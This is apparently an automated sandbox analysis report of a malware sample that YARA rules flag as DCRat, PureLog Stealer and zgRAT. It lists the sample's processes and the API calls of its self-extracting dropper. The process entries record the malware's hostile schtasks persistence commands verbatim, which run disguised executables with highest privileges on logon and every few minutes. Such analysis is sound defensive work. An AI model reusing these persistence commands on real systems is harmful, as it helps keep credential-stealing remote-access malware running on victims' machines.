Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1672060273.0000000000B82000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 73%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:51:57
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:51:57
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:51:57
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:51:57
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 12 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:51:57
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:51:57
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:51:57
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:51:58
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:51:59
Start date:	01/01/2025
Path:	C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
Imagebase:	0x740000
File size:	1'991'168 bytes
MD5 hash:	BA58757137700B6B304B45298D986EB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 73%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:51:59
Start date:	01/01/2025
Path:	C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
Imagebase:	0xf90000
File size:	1'991'168 bytes
MD5 hash:	BA58757137700B6B304B45298D986EB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:51:59
Start date:	01/01/2025
Path:	C:\Drivers\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Drivers\fontdrvhost.exe
Imagebase:	0x1f0000
File size:	1'991'168 bytes
MD5 hash:	BA58757137700B6B304B45298D986EB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:51:59
Start date:	01/01/2025
Path:	C:\Drivers\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Drivers\fontdrvhost.exe
Imagebase:	0x1c0000
File size:	1'991'168 bytes
MD5 hash:	BA58757137700B6B304B45298D986EB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2900490513.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	08:52:02
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat"
Imagebase:	0x7ff733fa0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	08:52:02
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	08:52:02
Start date:	01/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6553d0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	08:52:03
Start date:	01/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7e2ed0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	08:52:12
Start date:	01/01/2025
Path:	C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"
Imagebase:	0x740000
File size:	1'991'168 bytes
MD5 hash:	BA58757137700B6B304B45298D986EB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 73%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.4%
Total number of Nodes:	1511
Total number of Limit Nodes:	43

Executed Functions

Function 00FBDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FB0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00FB087C
Part of subcall function 00FB0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FB088E
Part of subcall function 00FB0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FB08BF

Part of subcall function 00FBA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00FBA655

Part of subcall function 00FBAC16: OleInitialize.OLE32(00000000), ref: 00FBAC2F
Part of subcall function 00FBAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FBAC66
Part of subcall function 00FBAC16: SHGetMalloc.SHELL32(00FE8438), ref: 00FBAC70

GetCommandLineW.KERNEL32 ref: 00FBDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00FBDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00FBDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00FBDFCE

Part of subcall function 00FBDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FBDBF4
Part of subcall function 00FBDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FBDC30

CloseHandle.KERNEL32(00000000), ref: 00FBDFD7
GetModuleFileNameW.KERNEL32(00000000,00FFEC90,00000800), ref: 00FBDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00FFEC90), ref: 00FBDFFE
GetLocalTime.KERNEL32(?), ref: 00FBE009
_swprintf.LIBCMT ref: 00FBE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00FBE05A
GetModuleHandleW.KERNEL32(00000000), ref: 00FBE061
LoadIconW.USER32(00000000,00000064), ref: 00FBE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00FBE0C9
Sleep.KERNEL32(?), ref: 00FBE0F7
DeleteObject.GDI32 ref: 00FBE130
DeleteObject.GDI32(?), ref: 00FBE140
CloseHandle.KERNEL32 ref: 00FBE183

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00FBE039
sfxname, xrefs: 00FBDFF9
STARTDLG, xrefs: 00FBE0BE
sfxstime, xrefs: 00FBE055
C:\Users\user\Desktop, xrefs: 00FBDF33
winrarsfxmappingfile.tmp, xrefs: 00FBDF77

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-3743209390
Opcode ID: 12243cc0d9e1d4e0484d855cb6a14325d85c4acc3b0d1c8982fb2d3c93fb0f18
Instruction ID: 40ea8d3fc20de8ac01ff0aebde070c77ff1b6aa533e82ff031887cbcb819e4c9
Opcode Fuzzy Hash: 12243cc0d9e1d4e0484d855cb6a14325d85c4acc3b0d1c8982fb2d3c93fb0f18
Instruction Fuzzy Hash: 1C612471904349AFD320AB76EC49FBB77ADEF45740F04002AF605962A2DB78D944FB62

Function 00FBA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FBB73D,00000066), ref: 00FBA6D5
SizeofResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA6EC
LoadResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA703
LockResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FBB73D,00000066), ref: 00FBA72D
GlobalLock.KERNEL32(00000000), ref: 00FBA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00FBA762
GlobalUnlock.KERNEL32(00000000), ref: 00FBA7C6

Part of subcall function 00FBA626: GdipAlloc.GDIPLUS(00000010), ref: 00FBA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FBA7A7
GlobalFree.KERNEL32(00000000), ref: 00FBA7CD

Strings

PNG, xrefs: 00FBA6C6

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 52b8e467a7013d65a5f168b2a010086dae27ab8b93950d993d323d4c18c8c36f
Instruction ID: 82bb2687432718ae8ca41c596fd03a5b6ed3e045ad3cab5bcfd07b0e757e5d88
Opcode Fuzzy Hash: 52b8e467a7013d65a5f168b2a010086dae27ab8b93950d993d323d4c18c8c36f
Instruction Fuzzy Hash: 7931A1B5A05306AFC7109F32DC89D5B7FBAFF84761B140519F94582621EF31D844EE62

Function 00FAA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6C4

Part of subcall function 00FABB03: _wcslen.LIBCMT ref: 00FABB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA728
GetLastError.KERNEL32(?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA734

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 55af0dc845231af1d157667081cd61ac33c2afdff881df283eff7eebc367f049
Instruction ID: 760170c329ce31aa84acd5b240c0adf1158f7e69943e749574a9b028442355b7
Opcode Fuzzy Hash: 55af0dc845231af1d157667081cd61ac33c2afdff881df283eff7eebc367f049
Instruction Fuzzy Hash: C241BFB2900119ABCB25DF68CC88AEAB7B8FF49350F044196E55DE3210D7346E94EF91

Function 00FC7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00FC7DC4,00000000,00FDC300,0000000C,00FC7F1B,00000000,00000002,00000000), ref: 00FC7E0F
TerminateProcess.KERNEL32(00000000,?,00FC7DC4,00000000,00FDC300,0000000C,00FC7F1B,00000000,00000002,00000000), ref: 00FC7E16
ExitProcess.KERNEL32 ref: 00FC7E28

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7859043806396e6742b0dccedbd25da39ac2915971bdbf2a9bbe919ded2e2709
Instruction ID: 2d2a51f7b44e932402d07f7623b7ab5338e1b77ca2e2c6a76434bb0d372c79e8
Opcode Fuzzy Hash: 7859043806396e6742b0dccedbd25da39ac2915971bdbf2a9bbe919ded2e2709
Instruction Fuzzy Hash: E9E04632401249ABCF017F20CE0EE4A3F6AEB00351F004459F909AA132CB3ADE92EA90

Function 00FA848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA8493

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 01d2ed8cf8971631c15a02bf0d4ff84ddfe86e445a8dda738955567f2517f418
Instruction ID: eb261c1d2ab73d87b6724624b7eec8c4811a01df9093d5ee37b06aced3ab410f
Opcode Fuzzy Hash: 01d2ed8cf8971631c15a02bf0d4ff84ddfe86e445a8dda738955567f2517f418
Instruction Fuzzy Hash: CC824DF1D04245AEDF15DF64C881BFABBB9BF07350F0840B9D8499B142CBB45A86EB60

Function 00FBB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FBB7E5

Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FBB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBB8EF
IsDialogMessageW.USER32(?,?), ref: 00FBB902
TranslateMessage.USER32(?), ref: 00FBB910
DispatchMessageW.USER32(?), ref: 00FBB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00FBB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00FBB960
GetDlgItem.USER32(?,00000068), ref: 00FBB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FBB99E
SendMessageW.USER32(00000000,000000C2,00000000,00FD35F4), ref: 00FBB9B1

Part of subcall function 00FBD453: _wcslen.LIBCMT ref: 00FBD47D

SetFocus.USER32(00000000), ref: 00FBB9B8
_swprintf.LIBCMT ref: 00FBBA24

